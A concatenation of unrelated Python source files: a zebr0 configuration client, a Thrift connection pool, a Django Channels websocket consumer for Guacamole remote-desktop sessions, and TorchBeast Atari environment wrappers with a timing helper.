threading.Thread(target=self.server.serve_forever).start()
def stop(self) -> None:
""" Stops the server. """
self.server.shutdown()
self.server.server_close()
def __enter__(self) -> TestServer:
""" When used as a context manager, starts the server at the beginning of the "with" block. """
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
""" When used as a context manager, stops the server at the end of the "with" block. """
self.stop()
def read(path: str, encoding: str = ENCODING) -> str:
"""
Filter for the Jinja templating engine, that allows to read a file's content.
:param path: path to the file
:param encoding: encoding of the file, defaults to "utf-8"
:return: the content of the file
"""
path = Path(path)
return path.read_text(encoding=encoding) if path.is_file() else ""
def build_argument_parser(*args: Any, **kwargs: Any) -> argparse.ArgumentParser:
"""
Builds an ArgumentParser that zebr0 executables can use to share a common Client CLI syntax.
For some reason, subclassing argparse.ArgumentParser and adding the arguments in the constructor doesn't work well with subparsers.
A builder function does.
:param args: arguments of the ArgumentParser constructor
:param kwargs: keyword arguments of the ArgumentParser constructor
:return: the customized ArgumentParser
"""
argparser = argparse.ArgumentParser(*args, **kwargs)
argparser.add_argument("-u", "--url", help="URL of the key-value server, defaults to https://hub.zebr0.io", metavar="<url>")
argparser.add_argument("-l", "--levels", nargs="*", help='levels of specialization (e.g. "mattermost production" for a <project>/<environment>/<key> structure), defaults to ""', metavar="<level>")
argparser.add_argument("-c", "--cache", type=int, help="in seconds, the duration of the cache of http responses, defaults to 300 seconds", metavar="<duration>")
argparser.add_argument("-f", "--configuration-file", type=Path, default=CONFIGURATION_FILE_DEFAULT, help=f"path to the configuration file, defaults to {CONFIGURATION_FILE_DEFAULT} for a system-wide configuration", metavar="<path>")
return argparser
def main(args: Optional[List[str]] = None) -> None:
"""
usage: zebr0-setup [-h] [-u <url>] [-l [<level> [<level> ...]]] [-c <duration>] [-f <path>] [-t <key>]
Saves zebr0's configuration in a JSON file.
optional arguments:
-h, --help show this help message and exit
-u <url>, --url <url>
URL of the key-value server, defaults to https://hub.zebr0.io
-l [<level> [<level> ...]], --levels [<level> [<level> ...]]
levels of specialization (e.g. "mattermost production" for a <project>/<environment>/<key> structure), defaults to ""
-c <duration>, --cache <duration>
in seconds, the duration of the cache of http responses, defaults to 300 seconds
-f <path>, --configuration-file <path>
path to the configuration file, defaults to /etc/zebr0.conf for a system-wide configuration
-t <key>, --test <key>
tests the configuration by fetching a key (e.g. 'fqdn')
"""
argparser = build_argument_parser(description="Saves zebr0's configuration in a JSON file.")
argparser.add_argument("-t", "--test", help="tests the configuration by fetching a key (e.g. 'fqdn')", metavar="<key>")
args = argparser.parse_args(args)
# creates a client from the given parameters, then saves the configuration
client = Client(args.url, args.levels, args.cache)
client.save_configuration(args.configuration_file)
if args.test:
# creates a client from the configuration file, then tests the configuration
client = Client(configuration_file=args.configuration_file)
print(client.get(args.test))
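# Illustrative sketch (assumptions: the package is importable, port 8000 is free, and the key name
# "mattermost/production/fqdn" is made up for the example):
#
#     with TestServer({"mattermost/production/fqdn": "chat.example.com"}) as server:
#         client = Client(url="http://127.0.0.1:8000", levels=["mattermost", "production"], cache=1)
#         print(client.get("fqdn"))  # -> "chat.example.com", resolved at the deepest matching level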
|
connection_pool.py
|
# -*- coding: utf-8 -*-
import logging
import contextlib
import random
import threading
import time
import socket
from collections import deque
from .hooks import api_call_context, client_get_hook
logger = logging.getLogger(__name__)
SIGNAL_CLOSE_NAME = "close"
def validate_host_port(host, port):
if not all((host, port)):
raise RuntimeError("host and port not valid: %r:%r" % (host, port))
class ThriftBaseClient(object):
def __init__(self, host, port, transport, protocol, service,
keepalive=None, pool_generation=0, tracking=False,
tracker_factory=None, pool=None, socket=None, use_limit=None):
self.host = host
self.port = port
self.transport = transport
self.protocol = protocol
self.service = service
self.keepalive = keepalive
self.alive_until = time.time() + keepalive if keepalive else None
self.use_count = 0
self.use_limit = use_limit
self.pool_generation = pool_generation
self.tracking = tracking
self.tracker_factory = tracker_factory
self.socket = socket
self.pool = pool
self.latest_use_time = time.time()
self.client = self.get_tclient(service, protocol)
self.init_client(self.client)
def __repr__(self):
return "<%s service=%s>" % (
self.__class__.__name__,
self.service.__name__
)
def __getattr__(self, name):
return getattr(self.client, name)
def init_client(self, client):
pass
def close(self):
try:
self.transport.close()
except Exception as e:
logger.warn("Connection close failed: %r" % e)
finally:
self.pool.signal_handler(SIGNAL_CLOSE_NAME, self)
def is_expired(self):
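        # Past `alive_until`, expire probabilistically (the longer past the deadline, the more likely),
        # so connections created together are not all torn down at the same moment.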
now = time.time()
return (self.alive_until and now > self.alive_until and
random.random() < (now - self.alive_until)/self.keepalive)
def incr_use_count(self):
self.use_count += 1
def set_latest_use_time(self, time):
self.latest_use_time = time
def is_tired(self):
return self.use_limit and self.use_count > self.use_limit
def test_connection(self):
if self.is_expired() or self.is_tired():
return False
try:
self.ping()
return True
except:
return False
@classmethod
def connect(cls, service, host, port, timeout=30, keepalive=None,
pool_generation=0, tracking=False, tracker_factory=None,
pool=None, use_limit=None):
SOCKET = cls.get_socket_factory()(host, port)
cls.set_timeout(SOCKET, timeout * 1000)
PROTO_FACTORY = cls.get_protoco_factory()
TRANS_FACTORY = cls.get_transport_factory()
transport = TRANS_FACTORY(SOCKET)
protocol = PROTO_FACTORY(transport)
transport.open()
return cls(
host=host,
port=port,
transport=transport,
protocol=protocol,
service=service,
keepalive=keepalive,
pool_generation=pool_generation,
tracking=tracking,
tracker_factory=tracker_factory,
pool=pool,
socket=SOCKET,
use_limit=use_limit,
)
@property
def TTransportException(self):
raise NotImplementedError
@classmethod
def get_protoco_factory(self):
raise NotImplementedError
@classmethod
def get_transport_factory(self):
raise NotImplementedError
def get_tclient(self, service, protocol):
raise NotImplementedError
@classmethod
def get_socket_factory(self):
raise NotImplementedError
@classmethod
def set_timeout(cls, socket, timeout):
raise NotImplementedError
def set_client_timeout(self, timeout):
self.set_timeout(self.socket, timeout)
def get_timeout(self):
raise NotImplementedError
class ThriftClient(ThriftBaseClient):
def init_client(self, client):
for api in dir(client):
if not api.startswith(('_', '__', 'send_', 'recv_')):
target = getattr(client, api)
setattr(client, api,
api_call_context(self.pool, self, api)(target))
@property
def TTransportException(self):
from thrift.transport.TTransport import TTransportException
return TTransportException
@classmethod
def get_protoco_factory(self):
from thrift.protocol import TBinaryProtocol
return TBinaryProtocol.TBinaryProtocolAccelerated
@classmethod
def get_transport_factory(self):
from thrift.transport import TTransport
return TTransport.TBufferedTransport
def get_tclient(self, service, protocol):
if self.tracking is True:
raise NotImplementedError(
"%s doesn't support tracking" % self.__class__.__name__)
return service.Client(protocol)
@classmethod
def get_socket_factory(self):
from thrift.transport import TSocket
return TSocket.TSocket
@classmethod
def set_timeout(cls, socket, timeout):
socket.setTimeout(timeout)
def get_timeout(self):
return self.socket._timeout
class ThriftPyBaseClient(ThriftBaseClient):
def init_client(self, client):
for api in self.service.thrift_services:
target = getattr(client, api)
setattr(client, api,
api_call_context(self.pool, self, api)(target))
@property
def TTransportException(self):
from thriftpy2.transport import TTransportException
return TTransportException
def get_tclient(self, service, protocol):
if self.tracking is True:
from thriftpy2.contrib.tracking import TTrackedClient
client = TTrackedClient(self.tracker_factory, service, protocol)
else:
from thriftpy2.thrift import TClient
client = TClient(service, protocol)
return client
@classmethod
def get_socket_factory(self):
from thriftpy2.transport import TSocket
return TSocket
@classmethod
def set_timeout(cls, socket, timeout):
socket.set_timeout(timeout)
def get_timeout(self):
return self.socket.socket_timeout
class ThriftPyClient(ThriftPyBaseClient):
@classmethod
def get_protoco_factory(self):
from thriftpy2.protocol import TBinaryProtocolFactory
return TBinaryProtocolFactory().get_protocol
@classmethod
def get_transport_factory(self):
from thriftpy2.transport import TBufferedTransportFactory
return TBufferedTransportFactory().get_transport
class ThriftPyCyClient(ThriftPyBaseClient):
@classmethod
def get_protoco_factory(self):
from thriftpy2.protocol import TCyBinaryProtocolFactory
return TCyBinaryProtocolFactory().get_protocol
@classmethod
def get_transport_factory(self):
from thriftpy2.transport import TCyBufferedTransportFactory
return TCyBufferedTransportFactory().get_transport
class BaseClientPool(object):
QueueCls = deque
def __init__(self, service, timeout=30, name=None, raise_empty=False,
max_conn=30, connection_class=ThriftClient, keepalive=None,
tracking=False, tracker_factory=None, use_limit=None):
if service is None:
raise RuntimeError("Service cannot be None")
self.service = service
self.timeout = timeout
self.name = name or service.__name__
self.connections = self.QueueCls()
self.raise_empty = raise_empty
self.max_conn = max_conn
self.connection_class = connection_class
self.keepalive = keepalive
self.use_limit = use_limit
self.generation = 0
self.tracking = tracking
self.tracker_factory = tracker_factory
self.conn_close_callbacks = []
self.__api_method_cache = {}
@contextlib.contextmanager
def annotate(self, **kwds):
if not self.tracking:
raise NotImplementedError("Tracking is not enabled")
with self.tracker_factory.annotate(**kwds) as annotation:
yield annotation
def keys(self):
return set([self.name, self.service.__name__])
def __repr__(self):
return "<%s service=%r>" % (
self.__class__.__name__,
self.keys()
)
def fill_connection_pool(self):
"""Fill connections pool
"""
rest_size = self.max_conn - self.pool_size()
for _ in range(rest_size):
try:
conn = self.produce_client()
self.put_back_connection(conn)
except Exception as e:
pass
def pool_size(self):
return len(self.connections)
def clear(self):
old_connections = self.connections
self.connections = self.QueueCls()
self.generation += 1
for c in old_connections:
c.close()
def get_client_from_pool(self):
connection = self._get_connection()
if connection is None:
return
if connection.test_connection(): # make sure old connection is usable
return connection
else:
connection.close()
def _get_connection(self):
if not self.connections:
if self.raise_empty:
raise self.Empty
return None
try:
return self.connections.popleft()
# When only one connection left, just return None if it
# has already been popped in another thread.
except IndexError:
return None
def put_back_connection(self, conn):
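        # Only re-queue connections that still fit in the pool and belong to the current generation;
        # clear() bumps the generation so stale connections get closed instead of reused.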
assert isinstance(conn, ThriftBaseClient)
if self.max_conn > 0 and self.pool_size() < self.max_conn and\
conn.pool_generation == self.generation:
if self.timeout != conn.get_timeout():
conn.set_client_timeout(self.timeout * 1000)
self.connections.append(conn)
return True
else:
conn.close()
return False
def produce_client(self, host=None, port=None):
if host is None and port is None:
host, port = self.yield_server()
elif not all((host, port)):
raise ValueError("host and port should be 'both none' \
or 'both provided' ")
return self.connection_class.connect(
self.service,
host,
port,
self.timeout,
keepalive=self.keepalive,
pool_generation=self.generation,
tracking=self.tracking,
tracker_factory=self.tracker_factory,
pool=self,
use_limit=self.use_limit,
)
@client_get_hook
def get_client(self):
return self.get_client_from_pool() or self.produce_client()
def __getattr__(self, name):
method = self.__api_method_cache.get(name)
if not method:
def method(*args, **kwds):
client = self.get_client()
api = getattr(client, name, None)
will_put_back = True
try:
if api and callable(api):
return api(*args, **kwds)
raise AttributeError("%s not found in %s" % (name, client))
except (client.TTransportException, socket.error):
will_put_back = False
client.close()
raise
finally:
if will_put_back:
self.put_back_connection(client)
self.__api_method_cache[name] = method
return method
@contextlib.contextmanager
def connection_ctx(self, timeout=None):
client = self.get_client()
if timeout is not None:
client.set_client_timeout(timeout * 1000)
try:
yield client
self.put_back_connection(client)
except (client.TTransportException, socket.error):
client.close()
raise
except Exception:
self.put_back_connection(client)
raise
@contextlib.contextmanager
def make_temporary_client(self, host, port):
client = self.produce_client(host, port)
try:
yield client
except Exception:
raise
finally:
client.close()
def register_after_close_func(self, func):
self.conn_close_callbacks.append(func)
def signal_handler(self, signal_name, conn):
if signal_name == SIGNAL_CLOSE_NAME:
for cb in self.conn_close_callbacks:
try:
cb(self, conn)
except:
logger.warn("%s Callback failed" % SIGNAL_CLOSE_NAME,
exc_info=True)
class ClientPool(BaseClientPool):
def __init__(self, service, host, port, timeout=30, name=None,
raise_empty=False, max_conn=30, connection_class=ThriftClient,
keepalive=None, tracking=False, tracker_factory=None,
use_limit=None):
validate_host_port(host, port)
super(ClientPool, self).__init__(
service=service,
timeout=timeout,
name=name,
raise_empty=raise_empty,
max_conn=max_conn,
connection_class=connection_class,
keepalive=keepalive,
tracking=tracking,
tracker_factory=tracker_factory,
use_limit=use_limit,
)
self.host = host
self.port = port
def set_servers(self, server_info):
host, port = server_info
validate_host_port(host, port)
self.host = host
self.port = port
self.clear()
# def fill_connection_pool(self):
# raise RuntimeError(
# '{!r} class not support to fill connection pool'.format(
# self.__class__.__name__))
def yield_server(self):
return self.host, self.port
class HeartbeatClientPool(ClientPool):
def __init__(self, service, host, port, timeout=30, name=None,
raise_empty=False, max_conn=30, connection_class=ThriftClient,
keepalive=None, tracking=False, tracker_factory=None,
use_limit=None, check_interval=10):
super(HeartbeatClientPool, self).__init__(
service=service,
host=host,
port=port,
timeout=timeout,
name=name,
raise_empty=raise_empty,
max_conn=max_conn,
connection_class=connection_class,
keepalive=keepalive,
tracking=tracking,
tracker_factory=tracker_factory,
use_limit=use_limit,
)
self.check_interval = check_interval
t = threading.Thread(target=self.maintain_connections)
t.daemon = True
t.start()
def get_client_from_pool(self):
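        # Unlike the base pool, skip the per-checkout liveness test; the background heartbeat
        # thread started in __init__ keeps pooled connections healthy.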
return self._get_connection()
def maintain_connections(self):
while True:
try:
self.fill_connection_pool()
pool_size = self.pool_size()
for _ in range(pool_size):
conn = self.get_client_from_pool()
if conn is None:
self.fill_connection_pool()
break
if not conn.test_connection():
conn.close()
conn = self.produce_client()
self.put_back_connection(conn)
except Exception as e:
pass
time.sleep(self.check_interval)
# def maintain_connections(self):
# sleep_time = max(1, self.timeout-5)
# while True:
# time.sleep(sleep_time)
# pool_size = self.pool_size()
# for _ in range(pool_size):
# conn = self.get_client_from_pool()
# if conn is None:
# break
# if (time.time()-conn.latest_use_time < self.check_interval or
# conn.test_connection()):
# self.put_back_connection(conn)
# else:
# conn.close()
class MultiServerClientBase(BaseClientPool):
def __init__(self, service, servers, timeout=30, name=None,
raise_empty=False, max_conn=30, connection_class=ThriftClient,
keepalive=None, tracking=False, tracker_factory=None,
use_limit=None):
super(MultiServerClientBase, self).__init__(
service=service,
timeout=timeout,
name=name,
raise_empty=raise_empty,
max_conn=max_conn,
connection_class=connection_class,
keepalive=keepalive,
tracking=tracking,
            tracker_factory=tracker_factory,
use_limit=use_limit,
)
self.servers = list(servers)
def set_servers(self, server_info):
for i in server_info:
assert len(i) == 2
validate_host_port(*i)
self.servers = server_info
self.clear()
class RandomMultiServerClient(MultiServerClientBase):
def yield_server(self):
assert len(self.servers) > 0
return random.choice(self.servers)
class RoundRobinMultiServerClient(MultiServerClientBase):
def __init__(self, *args, **kwds):
super(RoundRobinMultiServerClient, self).__init__(*args, **kwds)
self.index = random.randint(0, len(self.servers) - 1)
random.shuffle(self.servers)
def yield_server(self):
assert len(self.servers) > 0
if self.index >= len(self.servers):
self.index = 0
ret = self.servers[self.index]
self.index += 1
return ret
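# Illustrative usage sketch (hypothetical thriftpy2 service module and address, not part of this module):
#
#     pool = ClientPool(pingpong_thrift.PingService, "127.0.0.1", 6000,
#                       connection_class=ThriftPyCyClient, max_conn=10, keepalive=60)
#     pool.ping()                                  # any service API is proxied through __getattr__
#     with pool.connection_ctx(timeout=5) as c:    # or borrow a client explicitly
#         c.ping()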
|
websocket_layer.py
|
import threading
from channels.generic.websocket import WebsocketConsumer
from django.conf import settings
from server.models import RemoteUserBindHost
from webssh.models import TerminalSession
import django.utils.timezone as timezone
from django.db.models import Q
from asgiref.sync import async_to_sync
from util.tool import gen_rand_char, terminal_log, res
from util.crypto import decrypt
import time
from .guacamoleclient import Client
import re
import base64
from django.http.request import QueryDict
try:
terminal_exipry_time = settings.CUSTOM_TERMINAL_EXIPRY_TIME
except Exception:
terminal_exipry_time = 60 * 30
class WebGuacamole(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
query_string = self.scope.get('query_string').decode()
guacamole_args = QueryDict(query_string=query_string, encoding='utf-8')
self.hostid = int(guacamole_args.get('hostid'))
self.remote_host = None
self.width = guacamole_args.get('width')
self.height = guacamole_args.get('height')
self.dpi = guacamole_args.get('dpi')
self.session = None
self.start_time = timezone.now()
        self.send_flag = 0  # 0: send on this consumer's own channel; 1: send on the group channel (used when an administrator joins the group to watch the session)
self.group = 'session_' + gen_rand_char()
self.guacamoleclient = None
self.lock = False
self.last_operation_time = time.time()
self.closed = False
self.client = None
self.user_agent = None
def connect(self):
self.accept('guacamole')
        async_to_sync(self.channel_layer.group_add)(self.group, self.channel_name)  # join the channel group
self.session = self.scope.get('session', None)
        if not self.session.get('islogin', None):  # not logged in: close the websocket immediately
self.close(3001)
        if 'webguacamole终端' not in self.session[settings.INIT_PERMISSION]['titles']:  # permission check
self.close(3001)
if not self.session['issuperuser']:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
Q(user__username=self.session['username']) | Q(group__user__username=self.session['username']),
).distinct()
else:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
).distinct()
if not hosts:
self.close(3001)
self.remote_host = RemoteUserBindHost.objects.get(id=self.hostid)
_type = 7
        if self.remote_host.get_protocol_display() == 'vnc':  # VNC login does not require an account
_type = 8
self.guacamoleclient = Client(websocker=self)
self.guacamoleclient.connect(
protocol=self.remote_host.get_protocol_display(),
hostname=self.remote_host.ip,
port=self.remote_host.port,
username=self.remote_host.remote_user.username,
password=decrypt(self.remote_host.remote_user.password),
width=self.width,
height=self.height,
dpi=self.dpi,
)
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'user-agent':
self.user_agent = i[1].decode('utf-8')
break
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'x-real-ip':
self.client = i[1].decode('utf-8')
break
if i[0].decode('utf-8') == 'x-forwarded-for':
self.client = i[1].decode('utf-8').split(',')[0]
break
self.client = self.scope['client'][0]
data = {
'name': self.channel_name,
'group': self.group,
'user': self.session.get('username'),
'host': self.remote_host.ip,
'username': self.remote_host.remote_user.username,
'protocol': self.remote_host.protocol,
'port': self.remote_host.port,
'type': _type, # 7 webrdp 8 webvnc
'address': self.client,
'useragent': self.user_agent,
}
TerminalSession.objects.create(**data)
t = threading.Thread(target=self.check_timeout)
t.daemon = True
t.start()
def disconnect(self, close_code):
time.sleep(0.5)
if not self.closed:
self.closed = True
try:
async_to_sync(self.channel_layer.group_discard)(self.group, self.channel_name)
if close_code != 3001:
self.guacamoleclient.close()
except Exception:
pass
finally:
if self.guacamoleclient.res:
try:
tmp = list(self.guacamoleclient.res)
self.guacamoleclient.res = []
res(self.guacamoleclient.res_file, tmp, False)
except Exception:
pass
try:
terminal_log(
self.session.get('username'),
self.remote_host.hostname,
self.remote_host.ip,
self.remote_host.get_protocol_display(),
self.remote_host.port,
self.remote_host.remote_user.username,
'',
self.guacamoleclient.res_file,
self.client,
self.user_agent,
self.start_time,
)
except Exception:
pass
TerminalSession.objects.filter(name=self.channel_name, group=self.group).delete()
def receive(self, text_data=None, bytes_data=None):
if not self.lock:
self.guacamoleclient.shell(text_data)
if not text_data.startswith('4.sync') and not text_data.startswith('3.nop'):
self.last_operation_time = time.time()
else:
if text_data.startswith('4.sync') or text_data.startswith('3.nop'):
self.guacamoleclient.shell(text_data)
else:
if re.match(r'^5\.mouse,.*1\.1;$', text_data) or re.match(r'^3\.key,.*1\.1;$', text_data):
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
                    self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message))  # send a warning toast to the client
    # Called from outside this consumer via channels.layers by sending a message with type "group.message"
def group_message(self, data):
try:
self.send(data['text'])
except Exception:
pass
    # Called from outside this consumer via channels.layers by sending a message with type "close.message"
def close_message(self, data):
try:
message = str(base64.b64encode('当前会话已被管理员关闭'.encode('utf-8')), 'utf-8')
            # send a toastr warning to the client
            # a custom toastr handler must be defined in guacamole/js/all.js
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
def lock_message(self, data):
if not self.lock:
self.lock = True
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message))
def unlock_message(self, data):
if self.lock:
self.lock = False
message = str(base64.b64encode('当前会话已被管理员解锁'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.0,{0}.{1};'.format(len(message), message))
def check_timeout(self, sleep_time=3):
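        # Poll every `sleep_time` seconds and close the connection once it has been idle
        # (no client input) for longer than terminal_exipry_time.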
while 1:
if self.closed:
break
if int(time.time() - self.last_operation_time) >= terminal_exipry_time:
try:
message = str(base64.b64encode('由于长时间没有操作或者没有数据返回,连接已断开!'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
break
time.sleep(sleep_time)
|
impala_original.py
|
# https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
assert max_episode_steps is None
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
class ImageToPyTorch(gym.ObservationWrapper):
"""
    Convert image observations from (height, width, channels) to (channels, height, width)
"""
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.uint8,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
def wrap_pytorch(env):
return ImageToPyTorch(env)
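# Illustrative composition (assumes gym with the Atari ROMs installed):
#
#     env = wrap_pytorch(wrap_deepmind(make_atari("PongNoFrameskip-v4"), frame_stack=True))
#     obs = env.reset()   # uint8 observation shaped (4, 84, 84): stacked grayscale frames, channels first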
"""Naive profiling using timeit. (Used in MonoBeast.)"""
import collections
import timeit
class Timings:
"""Not thread-safe."""
def __init__(self):
self._means = collections.defaultdict(int)
self._vars = collections.defaultdict(int)
self._counts = collections.defaultdict(int)
self.reset()
def reset(self):
self.last_time = timeit.default_timer()
def time(self, name):
"""Save an update for event `name`.
Nerd alarm: We could just store a
collections.defaultdict(list)
and compute means and standard deviations at the end. But thanks to the
clever math in Sutton-Barto
(http://www.incompleteideas.net/book/first/ebook/node19.html) and
https://math.stackexchange.com/a/103025/5051 we can update both the
means and the stds online. O(1) FTW!
"""
now = timeit.default_timer()
x = now - self.last_time
self.last_time = now
n = self._counts[name]
mean = self._means[name] + (x - self._means[name]) / (n + 1)
var = (
n * self._vars[name] + n * (self._means[name] - mean) ** 2 + (x - mean) ** 2
) / (n + 1)
self._means[name] = mean
self._vars[name] = var
self._counts[name] += 1
def means(self):
return self._means
def vars(self):
return self._vars
def stds(self):
return {k: v ** 0.5 for k, v in self._vars.items()}
def summary(self, prefix=""):
means = self.means()
stds = self.stds()
total = sum(means.values())
result = prefix
for k in sorted(means, key=means.get, reverse=True):
result += f"\n %s: %.6fms +- %.6fms (%.2f%%) " % (
k,
1000 * means[k],
1000 * stds[k],
100 * means[k] / total,
)
result += "\nTotal: %.6fms" % (1000 * total)
return result
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
